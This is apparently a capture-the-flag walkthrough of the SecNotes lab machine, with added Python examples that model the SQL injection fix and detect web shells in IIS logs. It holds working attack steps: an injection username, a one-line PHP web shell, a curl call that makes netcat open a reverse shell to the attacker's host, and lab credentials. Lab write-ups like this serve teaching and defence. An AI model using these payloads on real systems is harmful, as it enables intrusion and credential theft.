1. Scanning
445 open suggests an SMB login may be possible; 8808 is HTTP.
C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.97
Discovered open port 8808/tcp on 10.10.10.97
Discovered open port 80/tcp on 10.10.10.97
^Zte: 0.00-kpps, 100.00% done, waiting -22-secs, found=3
[1]+ Stopped masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0
C:\root> nmap -A 10.10.10.97 -p445,8808,80
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-12 09:48 CST
Nmap scan report for secnotes.htb (10.10.10.97)
Host is up (0.35s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h39m59s, deviation: 4h37m09s, median: -1s
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2021-02-11T17:48:43-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-12T01:48:45
|_ start_date: N/A
2. Injection & SMB exploitation
8808
Register and log in. The app is ordinary, nothing useful at first.
At registration, use the injection as the username: test' or 1=1-- -
Log in again and new content shows up, clearly SMB login credentials. Add this to the local /etc/hosts:
10.10.10.97 secnotes.htb
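Why the registered username leaks other users' notes: the notes lookup pastes the username straight into the SQL text, so the payload above closes the quote, appends "or 1=1" and comments out the rest. The block below is an added Python model of that pattern (not the box's PHP code); the sqlite3 table, its constructed rows and the function names are assumptions. The vulnerable lookup returns every note for the write-up's payload; the parameterised one binds the same string as data and returns nothing.

```python
import sqlite3

# Constructed sample data: each user's notes are keyed by username.
SAMPLE_NOTES = [
    ("alice", "alice's private note"),
    ("bob", "bob's private note"),
    ("tyler", "note with share credentials (constructed)"),
]

# The username registered in the write-up.
PAYLOAD = "test' or 1=1-- -"


def make_db():
    """Build an in-memory notes table with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes (username TEXT, body TEXT)")
    conn.executemany("INSERT INTO notes VALUES (?, ?)", SAMPLE_NOTES)
    return conn


def notes_for_user_vulnerable(conn, username):
    # String concatenation: the username becomes part of the SQL text,
    # so a quote and a comment marker inside it rewrite the WHERE clause.
    sql = "SELECT body FROM notes WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def notes_for_user_safe(conn, username):
    # Parameterised query: the username is bound as a value and is never
    # parsed as SQL, whatever characters it contains.
    sql = "SELECT body FROM notes WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def demo(username=PAYLOAD):
    """Run both lookups against the same data for the given username."""
    conn = make_db()
    return {
        "vulnerable": notes_for_user_vulnerable(conn, username),
        "safe": notes_for_user_safe(conn, username),
    }


if __name__ == "__main__":
    for mode, rows in demo().items():
        print(f"{mode}: {len(rows)} row(s) -> {rows}")
```

The fix on the application side is the same as in the safe function: bind user input as parameters (PDO prepared statements in PHP) rather than building the query string, and treat the username field at registration as untrusted like any other input.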
Connect to the share with smbclient:
smbclient //secnotes.htb/new-site -U "tyler"
and enter the password 92g!mA8BGjOirkL%OG*&
ls shows it is just the IIS default images from the web page, so whatever gets uploaded here appears on the website accordingly.
Following the usual routine, IIS would take asp/aspx and the like, but none of those worked. Next try uploading cmd.php:
put cmd.php
Tested whoami and it displayed successfully.
Contents of cmd.php:
<?php echo shell_exec($_GET['cmd']); ?>
Then upload nc:
put nc.exe
and call it to get a shell back.
Ran it many times but no shell ever came back.
In the end, uploading the 64-bit nc and calling it through curl is what worked:
curl "http://10.10.10.97:8808/cmd.php?cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443"
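Because the share is the web root of the 8808 site, any file written over SMB is served by IIS, and a dropped .php file executes. From the defender's side, the activity above is visible in the IIS request log: a script that is not part of the deployed site starts answering 200, and its query string carries command-like values. The block below is an added Python example, not part of the write-up: it parses constructed, simplified W3C-style log lines (the field set, the baseline file list and the sample requests are assumptions) and flags both conditions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines with a reduced field set:
# date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-02-12 01:50:01 GET /iisstart.htm - 10.10.14.15 200
2021-02-12 01:50:02 GET /iisstart.png - 10.10.14.15 200
2021-02-12 01:51:10 GET /cmd.php cmd=whoami 10.10.14.15 200
2021-02-12 01:52:30 GET /cmd.php cmd=nc64.exe+-e+cmd.exe+10.10.14.15+443 10.10.14.15 200
2021-02-12 01:53:00 GET /about.aspx - 10.10.14.20 404
"""

# Files the deployment legitimately serves (constructed baseline).
BASELINE = {"/iisstart.htm", "/iisstart.png"}
SCRIPT_EXT = re.compile(r"\.(php|asp|aspx|ashx|cgi)$", re.IGNORECASE)
CMD_HINTS = re.compile(r"\.exe\b|\bcmd\b|powershell|whoami", re.IGNORECASE)


def parse_iis_log(text):
    """Yield one dict per data line, named by the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line, skip rather than misalign columns
        yield dict(zip(fields, parts))


def find_suspicious(text, baseline=BASELINE):
    """Return (timestamp, uri-stem, reasons) for requests worth a look."""
    alerts = []
    for rec in parse_iis_log(text):
        stem = rec["cs-uri-stem"]
        query = rec["cs-uri-query"]
        served_ok = rec["sc-status"].startswith("2")
        reasons = []
        # A script file that is not in the baseline and actually served 2xx:
        # something was written into the web root outside the deployment.
        if served_ok and SCRIPT_EXT.search(stem) and stem not in baseline:
            reasons.append("script not in deployment baseline")
        if query != "-":
            # IIS logs the raw query string; parse_qs turns '+' back into spaces.
            for key, values in parse_qs(query).items():
                if any(CMD_HINTS.search(v) for v in values):
                    reasons.append(f"command-like value in parameter '{key}'")
        if reasons:
            alerts.append((rec["date"] + " " + rec["time"], stem, reasons))
    return alerts


if __name__ == "__main__":
    for when, stem, reasons in find_suspicious(SAMPLE_LOG):
        print(when, stem, "; ".join(reasons))
```

The baseline check is the more durable of the two signals: the query-string heuristic can be evaded, but a web root that only changes through a controlled deployment should never show a new script file serving 200. The underlying fix is not to expose the web root as a writable share (or, if the share is needed, to have IIS refuse script execution for that directory).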
3. Privilege escalation
Found bash, a Linux-only thing, on the user's desktop, which is odd.
Search the whole box for bash.exe:
where /R C:\ bash.exe
The second hit works.
From here it is the same as working on Linux; get a tty:
python -c 'import pty;pty.spawn("/bin/bash")'
Look at hidden files, find the history, and open it:
cat .bash_history
It contains the admin account and password: administrator%u6!4ZwgwOM#^OBf#Nwnh
Use psexec.py from the impacket package (https://github.com/SecureAuthCorp/impacket) to log in directly:
psexec.py administrator@10.10.10.97
Owned.